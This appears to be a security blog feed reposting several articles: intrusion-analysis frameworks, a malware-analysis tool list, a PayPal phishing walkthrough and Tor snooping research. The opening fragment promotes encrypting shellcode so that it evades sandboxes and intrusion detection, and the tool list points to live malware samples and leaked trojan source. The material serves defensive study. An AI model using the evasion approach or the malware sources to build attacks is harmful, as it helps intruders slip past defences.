Although I didn’t test it personally, I think that FortiSandbox, Sophos Sandstorm, Blue Coat, GateWatcher and their derivatives might fail badly…

To put it in a nutshell:
Basically, it can transform a script kiddie’s code (or a known one) into a zero-day.
IDPS will fail because it’s almost impossible to make a signature and difficult to make a regular expression or heuristic analysis.
Most sandboxes don’t use Intel’s AES-NI instructions directly, so they will not execute the code, so “everything is fine” for them, whereas it’s not.
The only way to defeat this type of shellcode/malware is to use appropriate sandboxing and/or AI.
Notice that the whole execution is done in pure assembly; no Python (or shitty OpenSSL) is needed for the shellcode’s/malware’s execution since I use built-in assembly instructions only, thus it’s system-independent (surely, you will have to assemble it for each one by adapting the instructions/opcodes, but they are still the same).

This is still a work in progress, I will implement Windows and BSD/Mac engines and PoCs ASAP.
IDPSes and sandboxes suck.

“Tradition becomes our security, and when the mind is secure it is in decay.”

Jiddu Krishnamurti

Original Post:

Digital Forensics According to the FORZA Model and Diamond Model for Intrusion Analysis

The Bridge on the River Forza

“We can teach these barbarians a lesson in Western methods and efficiency that will put them to shame.” -Colonel Nicholson (The Bridge on the River Kwai, 1957)

Efficiency. Something we look to implement in everything we do, whether that be through the elimination of waste through Six Sigma or through other frameworks and methodologies, efficiency is what we strive for. When performing digital forensics, efficiency and rigor in our approach, ensuring no stone is left unturned, are paramount to the success of the investigation.

One of the many frameworks that exists is FORZA, a group of tasks and processes in a digital forensics investigation that revolves around a triad of: Reconnaissance, Reliability, and Relevancy.

For Reconnaissance, the case examiner will collect, recover, decode, discover, extract, analyze, and convert data that is kept on different storage media to readable evidence.

Reliability speaks to the integrity of the evidence and the relationship between the people and the evidence such that it will hold up in court if prosecuted.

Relevancy asks whether the evidence actually bears on the question under investigation; evidence can be admissible in court and still be irrelevant to the case.

The FORZA Framework defines eight separate roles in a digital forensics investigation, the case leader, system/business owner, legal advisor, security/system architect/auditor, digital forensics specialist, digital forensics investigator/system administrator/operator, digital forensics analyst, and a legal prosecutor.

Each of these roles is interconnected through six categories of questions that must be answered in the investigation: (1) What (data); (2) Why (motivation); (3) How (function); (4) Who (people); (5) Where (network); and (6) When (time). If you think about it, this is very similar to what a crime scene investigator must answer when investigating a murder scene, which is why I’m always saying that digital forensics is like CSI: Miami meets Bones.

Here’s a short video I made on the topic.

Below is a table detailing out the responsibilities for each role in answering each of the six questions.

Okay, so now that we’ve covered FORZA (don’t get confused here), let’s discuss a newer, more novel model gaining widespread popularity, which is the Diamond Model of Intrusion Analysis; a model of intrusion analysis built by analysts, asking the simple question, “What is the underlying method to our work?” The model establishes the basic atomic element of any intrusion activity, the event, composed of four core features: adversary, infrastructure, capability, and victim.

These features are edge-connected representing their underlying relationships and arranged in the shape of a diamond, giving the model its name.

In its simplest form, the model describes that an adversary deploys a capability over some infrastructure against a victim. These activities are called events and are the atomic features. Analysts populate the model’s vertices as events are discovered and detected. The vertices are linked with edges highlighting the natural relationship between the features. By pivoting across edges and within vertices, analysts expose more information about adversary operations and discover new capabilities, infrastructure, and victims.

The Diamond Model of intrusion analysis comprises the core features of an intrusion event: adversary, capability, infrastructure, and victim. The core features are linked via edges to represent the fundamental relationships between the features which can be exploited analytically to further discover and develop knowledge of malicious activity.

The above depiction models analytic pivoting using the Diamond Model. One of the most powerful features of the Diamond — pivoting, allows an analyst to exploit the fundamental relationship between features (highlighted by edges between the features) to discover new knowledge of malicious activity.
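Pivoting is easy to see as a query. The Python below is an added illustration, not code from the Diamond Model paper or from Brier & Thorn: an event holds the four core features, a single pivot follows one edge (all values of one feature seen in events where another feature has a given value), and a chained pivot strings edges together, for example victim to infrastructure to victim, to find every other victim that talks to the same C2 host. The adversary labels, the 198.51.100.7 address and the victim names are constructed.

```python
from dataclasses import dataclass

# Added example, not the Diamond Model paper's code: events as records and
# pivoting as queries across the edges. All event data below is constructed.

FEATURES = ("adversary", "capability", "infrastructure", "victim")


@dataclass(frozen=True)
class Event:
    adversary: str
    capability: str
    infrastructure: str
    victim: str


class DiamondStore:
    def __init__(self, events):
        self.events = list(events)

    def pivot(self, feature, value, to):
        """Single-edge pivot: every `to` value seen in an event where feature == value."""
        if feature not in FEATURES or to not in FEATURES:
            raise ValueError("unknown feature")
        return sorted({getattr(e, to) for e in self.events
                       if getattr(e, feature) == value})

    def pivot_chain(self, feature, value, path):
        """Multi-hop pivot: follow each feature name in `path` in turn."""
        values, current = {value}, feature
        for nxt in path:
            values = {v for val in values for v in self.pivot(current, val, nxt)}
            current = nxt
        return sorted(values)


# Constructed events: an unattributed loader seen on one host talking to two
# victims, and a second, attributed tool on a different C2 hitting victim 2.
SAMPLE_EVENTS = [
    Event("unknown", "loader-A", "198.51.100.7", "victim-corp-1"),
    Event("unknown", "loader-A", "198.51.100.7", "victim-corp-2"),
    Event("actor-X", "rat-B", "c2.constructed.example", "victim-corp-2"),
]

if __name__ == "__main__":
    store = DiamondStore(SAMPLE_EVENTS)
    print("victims of 198.51.100.7:", store.pivot("infrastructure", "198.51.100.7", "victim"))
    print("victims sharing C2 with victim-corp-1:",
          store.pivot_chain("victim", "victim-corp-1", ["infrastructure", "victim"]))
    print("infrastructure reached from loader-A via its victims:",
          store.pivot_chain("capability", "loader-A", ["victim", "infrastructure"]))
```

The chained pivot is where the model earns its keep: starting from one victim, an infrastructure-to-victim hop surfaces victim-corp-2, and a further hop from that victim surfaces rat-B and actor-X, which the first victim’s own events never mentioned.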

Subsequent to this analysis is an Activity-Attack Graph, diagrammed above. This chart illustrates the integration of knowledge of actual adversary attack paths with the multitude of hypothetical attack paths that could be taken. Using an activity-attack graph highlights the potential paths of an adversary in the future as well as the preferred paths based on current knowledge.

As forensic analysts, we should always look to be continuously improving our craft, especially around our methodology in how we conduct investigations. I leave it to you to decide on which methodology you adopt, or possibly even make better.

A sample report has been created by Brier & Thorn that has been designed around the Diamond Model and is available here for free download.

More information on the Diamond Model can be found here and here.

Original Post:

Awesome Malware Analysis Lists

A curated list of awesome malware analysis tools and resources. Inspired by awesome-python and awesome-php.

Malware Collection


Web traffic anonymizers for analysts.

  • – A free, web based anonymizer.
  • OpenVPN – VPN software and hosting solutions.
  • Privoxy – An open source proxy server with some privacy features.
  • Tor – The Onion Router, for browsing the web without leaving traces of the client IP.


Trap and collect your own samples.

  • Conpot – ICS/SCADA honeypot.
  • Dionaea – Honeypot designed to trap malware.
  • Glastopf – Web application honeypot.
  • Honeyd – Create a virtual honeynet.
  • HoneyDrive – Honeypot bundle Linux distro.
  • Kippo – Medium interaction SSH honeypot.
  • Mnemosyne – A normalizer for honeypot data; supports Dionaea.
  • Thug – Low interaction honeyclient, for investigating malicious websites.

Malware Corpora

Malware samples collected for analysis.

  • Clean MX – Realtime database of malware and malicious domains.
  • Contagio – A collection of recent malware samples and analyses.
  • Exploit Database – Exploit and shellcode samples.
  • Malshare – Large repository of malware actively scraped from malicious sites.
  • maltrieve – Retrieve malware samples directly from a number of online sources.
  • MalwareDB – Malware samples repository.
  • theZoo – Live malware samples for analysts.
  • ViruSign – Malware database of samples detected by many anti-malware programs except ClamAV.
  • VirusShare – Malware repository, registration required.
  • Zeltser’s Sources – A list of malware sample sources put together by Lenny Zeltser.
  • Zeus Source Code – Source for the Zeus trojan leaked in 2011.

Open Source Threat Intelligence


Harvest and analyze IOCs.

  • Combine – Tool to gather Threat Intelligence indicators from publicly available sources.
  • IntelMQ – A tool for CERTs for processing incident data using a message queue.
  • IOC Editor – A free editor for XML IOC files, from Mandiant.
  • ioc_writer – Python library for working with OpenIOC objects, from Mandiant.
  • Massive Octo Spice – Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the CSIRT Gadgets Foundation.
  • MISP – Malware Information Sharing Platform curated by The MISP Project.
  • PassiveTotal – Research, connect, tag and share IPs and domains.
  • threataggregator – Aggregates security threats from a number of sources, including some of those listed below in other resources.
  • ThreatCrowd – A search engine for threats, with graphical visualization.
  • TIQ-test – Data visualization and statistical analysis of Threat Intelligence feeds.

Other Resources

Threat intelligence and IOC resources.

Detection and Classification

Antivirus and other malware identification tools

  • AnalyzePE – Wrapper for a variety of tools for reporting on Windows PE files.
  • chkrootkit – Local Linux rootkit detection.
  • ClamAV – Open source antivirus engine.
  • ExifTool – Read, write and edit file metadata.
  • hashdeep – Compute digest hashes with a variety of algorithms.
  • Loki – Host based scanner for IOCs.
  • Malfunction – Catalog and compare malware at a function level.
  • MASTIFF – Static analysis framework.
  • MultiScanner – Modular file scanning/analysis framework.
  • nsrllookup – A tool for looking up hashes in NIST’s National Software Reference Library database.
  • packerid – A cross-platform Python alternative to PEiD.
  • PEiD – Packer identifier for Windows binaries.
  • PEV – A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries.
  • Rootkit Hunter – Detect Linux rootkits.
  • ssdeep – Compute fuzzy hashes.
  • – Python script for easy searching of the database.
  • TrID – File identifier.
  • YARA – Pattern matching tool for analysts.
  • Yara rules generator – Generate yara rules based on a set of malware samples. Also contains a good strings DB to avoid false positives.

Online Scanners and Sandboxes

Web-based multi-AV scanners, and malware sandboxes for automated analysis.

  • AndroTotal – free online analysis of APKs against multiple mobile antivirus apps.
  • Anubis – Malware Analysis for Unknown Binaries and Site Check.
  • AVCaesar – online scanner and malware repository.
  • Cryptam – Analyze suspicious office documents.
  • Cuckoo Sandbox – Open source, self hosted sandbox and automated analysis system.
  • cuckoo-modified – Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author.
  • DeepViz – Multi-format file analyzer with machine-learning classification.
  • DRAKVUF – Dynamic malware analysis system.
  • Hybrid Analysis – Online malware analysis tool, powered by VxSandbox.
  • IRMA – An asynchronous and customizable analysis platform for suspicious files.
  • Jotti – Free online multi-AV scanner.
  • Malheur – Automatic sandboxed analysis of malware behavior.
  • Malwr – Free analysis with an online Cuckoo Sandbox instance.
  • MASTIFF Online – Online static analysis of malware.
  • Metascan Online – Free file scanning with multiple antivirus engines.
  • Noriben – Uses Sysinternals Procmon to collect information about malware in a sandboxed environment.
  • PDF Examiner – Analyse suspicious PDF files.
  • Recomposer – A helper script for safely uploading binaries to sandbox sites.
  • VirusTotal – Free online analysis of malware samples and URLs.
  • Zeltser’s List – Free automated sandboxes and services, compiled by Lenny Zeltser.

Domain Analysis

Inspect domains and IP addresses.

  • – One click tool to retrieve as much metadata as possible for a website and to assess its good standing.
  • Dig – Free online dig and other network tools.
  • IPinfo – Gather information about an IP or domain by searching online resources.
  • SenderBase – Search for IP, domain or network owner.
  • SpamCop – IP based spam block list.
  • SpamHaus – Block list based on domains and IPs.
  • Sucuri SiteCheck – Free Website Malware and Security Scanner.
  • TekDefense Automator – OSINT tool for gathering information about URLs, IPs, or hashes.
  • Whois – DomainTools free online whois search.
  • Zeltser’s List – Free online tools for researching malicious websites, compiled by Lenny Zeltser.

Browser Malware

Analyze malicious URLs. See also the domain analysis and documents and shellcode sections.

  • Firebug – Firefox extension for web development.
  • Java Decompiler – Decompile and inspect Java apps.
  • Java IDX Parser – Parses Java IDX cache files.
  • JSDetox – JavaScript malware analysis tool.
  • jsunpack-n – A javascript unpacker that emulates browser functionality.
  • Malzilla – Analyze malicious web pages.
  • RABCDAsm – A “Robust ActionScript Bytecode Disassembler.”
  • swftools – Tools for working with Adobe Flash files.
  • xxxswf – A Python script for analyzing Flash files.

Documents and Shellcode

Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section.

  • AnalyzePDF – A tool for analyzing PDFs and attempting to determine whether they are malicious.
  • diStorm – Disassembler for analyzing malicious shellcode.
  • JS Beautifier – JavaScript unpacking and deobfuscation.
  • libemu – Library and tools for x86 shellcode emulation.
  • malpdfobj – Deconstruct malicious PDFs into a JSON representation.
  • OfficeMalScanner – Scan for malicious traces in MS Office documents.
  • olevba – A script for parsing OLE and OpenXML documents and extracting useful information.
  • Origami PDF – A tool for analyzing malicious PDFs, and more.
  • PDF Tools – pdfid, pdf-parser, and more from Didier Stevens.
  • PDF X-Ray Lite – A PDF analysis tool, the backend-free version of PDF X-RAY.
  • peepdf – Python tool for exploring possibly malicious PDFs.
  • Spidermonkey – Mozilla’s JavaScript engine, for debugging malicious JS.

File Carving

For extracting files from inside disk and memory images.

  • bulk_extractor – Fast file carving tool.
  • EVTXtract – Carve Windows Event Log files from raw binary data.
  • Foremost – File carving tool designed by the US Air Force.
  • Hachoir – A collection of Python libraries for dealing with binary files.
  • Scalpel – Another data carving tool.


Reverse XOR and other code obfuscation methods.

  • Balbuzard – A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more.
  • de4dot – .NET deobfuscator and unpacker.
  • ex_pe_xor & iheartxor – Two tools from Alexander Hanel for working with single-byte XOR encoded files.
  • NoMoreXOR – Guess a 256 byte XOR key using frequency analysis.
  • unxor – Guess XOR keys using known-plaintext attacks.
  • XORBruteForcer – A Python script for brute forcing single-byte XOR keys.
  • XORSearch & XORStrings – A couple programs from Didier Stevens for finding XORed data.
  • xortool – Guess XOR key length, as well as the key itself.

Debugging and Reverse Engineering

Disassemblers, debuggers, and other static and dynamic analysis tools.

  • Bokken – GUI for Pyew and Radare.
  • dnSpy – .NET assembly editor, decompiler and debugger.
  • Evan’s Debugger (EDB) – A modular debugger with a Qt GUI.
  • GDB – The GNU debugger.
  • hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols.
  • IDA Pro – Windows disassembler and debugger, with a free evaluation version.
  • Immunity Debugger – Debugger for malware analysis and more, with a Python API.
  • ltrace – Dynamic analysis for Linux executables.
  • objdump – Part of GNU binutils, for static analysis of Linux binaries.
  • OllyDbg – An assembly-level debugger for Windows executables.
  • pestudio – Perform static analysis of Windows executables.
  • Process Monitor – Advanced monitoring tool for Windows programs.
  • Pyew – Python tool for malware analysis.
  • Radare2 – Reverse engineering framework, with debugger support.
  • strace – Dynamic analysis for Linux executables.
  • Udis86 – Disassembler library and tool for x86 and x86_64.
  • Vivisect – Python tool for malware analysis.
  • X64dbg – An open-source x64/x32 debugger for Windows.


Analyze network interactions.

  • Bro – Protocol analyzer that operates at incredible scale; both file and network protocols.
  • CapTipper – Malicious HTTP traffic explorer.
  • chopshop – Protocol analysis and decoding framework.
  • Fiddler – Intercepting web proxy designed for “web debugging.”
  • Hale – Botnet C&C monitor.
  • INetSim – Network service emulation, useful when building a malware lab.
  • Malcom – Malware Communications Analyzer.
  • Maltrail – A malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails and featuring a reporting and analysis interface.
  • mitmproxy – Intercept network traffic on the fly.
  • Moloch – IPv4 traffic capturing, indexing and database system.
  • NetworkMiner – Network forensic analysis tool, with a free version.
  • ngrep – Search through network traffic like grep.
  • Tcpdump – Collect network traffic.
  • tcpick – Track and reassemble TCP streams from network traffic.
  • tcpxtract – Extract files from network traffic.
  • Wireshark – The network traffic analysis tool.

Memory Forensics

Tools for dissecting malware in memory images or running systems.

  • DAMM – Differential Analysis of Malware in Memory, built on Volatility.
  • FindAES – Find AES encryption keys in memory.
  • Muninn – A script to automate portions of analysis using Volatility, and create a readable report.
  • Rekall – Memory analysis framework, forked from Volatility in 2013.
  • TotalRecall – Script based on Volatility for automating various malware analysis tasks.
  • VolDiff – Run Volatility on memory images before and after malware execution, and report changes.
  • Volatility – Advanced memory forensics framework.
  • WinDbg – Live memory inspection and kernel debugging for Windows systems.

Windows Artifacts

  • AChoir – A live incident response script for gathering Windows artifacts.
  • python-evt – Python library for parsing Windows Event Logs.
  • python-registry – Python library for parsing registry files.
  • RegRipper (GitHub) – Plugin-based registry analysis tool.

Storage and Workflow

  • Aleph – OpenSource Malware Analysis Pipeline System.
  • CRITs – Collaborative Research Into Threats, a malware and threat repository.
  • Malwarehouse – Store, tag, and search malware.
  • MISP – Malware Information Sharing Platform curated by The MISP Project.
  • Viper – A binary management and analysis framework for analysts and researchers.


  • DC3-MWCP – The Defense Cyber Crime Center’s Malware Configuration Parser framework.
  • Pafish – Paranoid Fish, a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do.
  • REMnux – Linux distribution and docker images for malware reverse engineering and analysis.
  • Santoku Linux – Linux distribution for mobile forensics, malware analysis, and security.



Essential malware analysis reading material.


Some relevant Twitter accounts.


Related Awesome Lists

Reference: github

Original Post:

Anatomy of Paypal Phishing Attack

The phishing email

The email header

Received: by with SMTP id u125csp1210882oia;
 Fri, 29 Jul 2016 04:32:30 -0700 (PDT)
X-Received: by with SMTP id t66mr661693wmt.41.1469791950832;
 Fri, 29 Jul 2016 04:32:30 -0700 (PDT)
Return-Path: <>
Received: from ( [])
 by with ESMTP id v66si3080759wmf.69.2016.
 for <>;
 Fri, 29 Jul 2016 04:32:30 -0700 (PDT)
Received-SPF: pass ( best guess record for domain of designates as permitted sender) client-ip=;
 spf=pass ( best guess record for domain of designates as permitted sender)
Received: by (Postfix, from userid 500)
 id 77A34104353; Fri, 29 Jul 2016 13:32:30 +0200 (CEST)
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on
X-Spam-Status: No, score=-1.2 required=5.0 tests=BAYES_00,HTML_FONT_SIZE_HUGE,
X-Spam-Languages: en
Received: by (Postfix, from userid 35301)
 id 8681717C0278; Fri, 29 Jul 2016 13:32:23 +0200 (CEST)
Subject: Unusual activity in your account
X-PHP-Script: for
From: Security Team <>
MIME-Version: 1.0
Content-Type: text/html
Message-Id: <>
Date: Fri, 29 Jul 2016 13:32:23 +0200 (CEST)

The phishing Paypal site

Without HTTPS, of course; my Firefox shows that it is hosted in Germany.


The phishing IP information


The phishing site registration information


Try to login the phishing site


Login failed. However, the “My Paypal” and “Log out” buttons at the top right corner don’t work.


After pressing the Continue button, it brings you to a page to update your credit/debit card.


The phisher wants all your information; you have to add a billing address in the next step.


The billing address page


The phisher will ask for your remaining information.


Congratulations! You have submitted all the necessary information to the phisher.


Finally, the phisher will bring you back to the real Paypal website.


Final Thought:

The phishing campaign’s website design and quality are good. The phisher is looking for high-quality data: there are many fields with validation, and the data collection flow is well done.

Avoiding this kind of phishing email is easy: the website has no HTTPS, and the domain name is very easy to identify.

Researchers find over 100 spying Tor nodes that attempt to compromise darknet sites


When it comes to accessing public websites, Tor has an intrinsic security problem: though the nodes between your computer and the public internet are unable to see where the traffic is coming from or going to, the final hop in the network (known as an exit node) gets to know what webserver you are connecting to.

If that final hop isn’t protected by an HTTPS connection — if it takes place without encryption — then all the traffic between you and the webserver are an open book to the exit node. It can see what you send and what you receive, and it can tamper with the connection (for example, it can inject malicious code that exploits bugs in your browser to take it over). If your session includes identifying information — your Google cookie, say, or a login and password — then someone running a spying exit node can figure out who you are without having to poison your session. This was much more of a problem when HTTPS connections were more rare, but now, thanks to the Snowden revelations and projects like Let’s Encrypt, much of the web is encrypted by default. That means that a spying exit node will only be able to see which server is being accessed, but not which page, and will not be able to inject code into the session, and will not be able to see the data going to and from the server.

There aren’t many exit nodes out there. Many people fear that running an exit node will put them in police crosshairs if it gets used in the commission of a crime. For the record, Boing Boing runs a very high-capacity exit node, and though we’ve received multiple contacts from US law enforcement, we’ve just explained that this is a Tor node that runs with logging switched off, and thus we have no information that’ll be relevant to any investigations, and the officers involved have thanked us and gone away without further trouble.

The lack of exit nodes means that if you run an exit node and want to spy on people, you can see an appreciable fraction of all the Tor traffic that goes to and from the public internet. Many governments, including the Chinese government, are understood to be running high-availability exit nodes that snoop on and log all the traffic they can see.

One answer to this problem is Tor “hidden services.” These are servers that have no public internet address; rather, they are accessed directly through the Tor network, without traffic ever being routed through an exit node. Because all this traffic takes place in the Tor network, without the intermediate nodes ever getting access to decrypted information, the sessions are considered very secure. Notorious darknet sites like The Silk Road ran as hidden services, and many sites maintain hidden service versions of their public offerings: for example, Facebook can be accessed on the Tor network via https://www.facebookcorewwwi.onion/, which resolves to a machine in one of Facebook’s data centers in Oregon, which is then bridged into the rest of Facebook’s system. By accessing Facebook over a .onion hidden service, you can disguise the fact that you’re visiting Facebook at all, and bypass censoring firewalls, like those used by schools, employers and governments.

However, hidden services are not without their own security issues. A pair of security researchers from Northeastern University have announced a paper (to be delivered at this summer’s Def Con hacker convention in Las Vegas) that reveals over 100 spying Tor nodes that were shown to be targeting hidden services.

These nodes — ordinary nodes, not exit nodes — sorted through all the traffic that passed through them, looking for anything bound for a hidden service, which allowed them to discover hidden services that had not been advertised. These nodes then attacked the hidden services by making connections to them and trying common exploits against the server-software running on them, seeking to compromise and take them over.

The researchers used “honeypot” .onion servers to find the spying computers: these honeypots were .onion sites that the researchers set up in their own lab and then connected to repeatedly over the Tor network, thus seeding many Tor nodes with the information of the honions’ existence. They didn’t advertise the honions’ existence in any other way and there was nothing of interest at these sites, and so when the sites logged new connections, the researchers could infer that they were being contacted by a system that had spied on one of their Tor network circuits.

This attack was already understood as a theoretical problem for the Tor project, which had recently undertaken a rearchitecting of the hidden service system that would prevent it from taking place.

No one knows who is running the spying nodes: they could be run by criminals, governments, private suppliers of “infowar” weapons to governments, independent researchers, or other scholars (though scholarly research would not normally include attempts to hack the servers once they were discovered).

“We create what we call ‘honey onions’ or ‘honions.’ These are onion addresses that we don’t share with anyone,” Noubir said. If someone visits the sites, it’s a good indication that their service has been picked up by a malicious HSDir.

At any one time, the pair ran 4,500 honey onions over 72 days, and found at least 110 HSDirs spying on hidden services. Some of the actors behind these weren’t just passive observers; many came back and then aggressively probed the hidden services.

“They’re looking for vulnerabilities in the web server,” Sanatinia said. Those attackers might look for cross-site scripting attacks, SQL-injection vulnerabilities, or just try to find the server’s status page, which can reveal lots of interesting, and potentially identifying, information about the site.

Most of the dodgy HSDirs the researchers found were hosted in the US, followed by Germany, France, and then other European countries. Of course, that doesn’t necessarily mean their operators are based in the same country; anyone can whip up a remote server from pretty much anywhere in the world. And because over half of the 110 nodes were hosted on cloud infrastructure, it’s not easy to immediately pin down who’s behind them.
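The honey-onion detection described above, as an added simulation that is not the researchers’ code: Tor’s real descriptor placement is more involved, so this constructed model simply publishes each unadvertised honion to HSDIRS_PER_ONION randomly chosen relays and assumes a snooping relay contacts every onion whose descriptor it holds; a logged visit then narrows the set of relays that could have leaked the address.

```python
"""Simplified 'honey onion' simulation (added example, constructed model)."""
import random

HSDIRS_PER_ONION = 6  # constructed: relays holding each honion's descriptor


def publish_honions(relays, n_honions, rng):
    """Map each unadvertised honion to the relays holding its descriptor."""
    return {f"honion-{i}": frozenset(rng.sample(relays, HSDIRS_PER_ONION))
            for i in range(n_honions)}


def simulate_visits(placement, snoopers):
    """Nobody but the descriptor holders knows a honion exists, so a logged
    visit means at least one holder used the address it was entrusted with."""
    return {onion for onion, holders in placement.items() if holders & snoopers}


def suspect_relays(placement, visited):
    """Group-testing inference over the visit log.

    A relay that held a descriptor of a honion nobody ever visited cannot be
    a consistently active snooper, so it is cleared; the remaining holders of
    visited honions are suspects. Snoopers are never cleared (every honion
    they see gets visited), so the result always contains them, and with
    enough honions honest relays that happened to share a honion with a
    snooper are weeded out as well. Relays that snoop only occasionally
    would escape this simple rule; that is a limitation of the model.
    """
    cleared = set()
    for onion, holders in placement.items():
        if onion not in visited:
            cleared |= holders
    suspects = set()
    for onion in visited:
        suspects |= placement[onion] - cleared
    return suspects


def run_simulation(n_relays=200, n_snoopers=3, n_honions=2000, seed=1):
    """Deploy honions against a constructed relay set with hidden snoopers;
    returns (true snoopers, inferred suspects, number of honions visited)."""
    rng = random.Random(seed)
    relays = [f"relay-{i}" for i in range(n_relays)]
    snoopers = set(rng.sample(relays, n_snoopers))
    placement = publish_honions(relays, n_honions, rng)
    visited = simulate_visits(placement, snoopers)
    return snoopers, suspect_relays(placement, visited), len(visited)


if __name__ == "__main__":
    truth, suspects, n_visited = run_simulation()
    print(f"{n_visited} honions visited")
    print(f"inferred: {sorted(suspects)}")
    print(f"actual:   {sorted(truth)}")
```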

Honey Onions: Exposing Snooping Tor HSDir Relays [Guevara Noubir and Amirali Sanatinia/Def Con]

Over 100 Snooping Tor Nodes Have Been Spying on Dark Web Sites[Joseph Cox/Motherboard]

(Image: Red onion closeup, Ogre, Public Domain)

Original Post:
